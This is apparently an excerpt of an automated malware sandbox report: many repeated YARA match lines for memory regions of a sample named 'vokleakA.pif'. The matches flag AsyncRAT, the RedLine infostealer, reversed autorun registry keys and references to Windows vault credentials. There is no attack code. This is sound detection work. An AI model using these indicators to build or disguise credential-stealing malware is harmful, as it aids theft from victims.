              Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
